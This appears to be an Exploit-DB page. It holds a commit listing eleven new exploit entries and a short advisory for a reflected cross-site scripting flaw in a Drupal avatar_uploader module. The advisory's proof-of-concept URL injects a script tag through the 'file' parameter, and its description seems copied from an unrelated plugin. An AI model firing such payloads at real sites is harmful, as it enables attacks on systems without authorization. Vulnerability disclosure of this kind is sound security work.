54b7907ae6
11 changes to exploits/shellcodes PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated) Kramer VIAware 2.5.0719.1034 - Remote Code Execution (RCE) ImpressCMS 1.4.2 - Remote Code Execution (RCE) Atom CMS 2.0 - Remote Code Execution (RCE) Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) WordPress Plugin Curtain 1.0.2 - Cross-site Request Forgery (CSRF) WordPress Plugin cab-fare-calculator 1.0.3 - Local File Inclusion WordPress Plugin video-synchro-pdf 1.7.4 - Local File Inclusion WordPress Plugin admin-word-count-column 2.2 - Local File Read CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated) WordPress Plugin Easy Cookie Policy 1.6.2 - Broken Access Control to Stored XSS
13 lines
No EOL
546 B
Text
13 lines
No EOL
546 B
Text
# Exploit Title: Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS)
|
|
# Date: 2022-03-22
|
|
# Author: Milad karimi
|
|
# Software Link: https://www.drupal.org/project/avatar_uploader
|
|
# Version: v7.x-1.0-beta8
|
|
# Tested on: Windows 10
|
|
# CVE: N/A
|
|
|
|
1. Description:
|
|
This plugin creates a avatar_uploader from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.
|
|
|
|
2. Proof of Concept:
|
|
http://$target/avatar_uploader.pages.inc?file=<script>alert("test")</script> |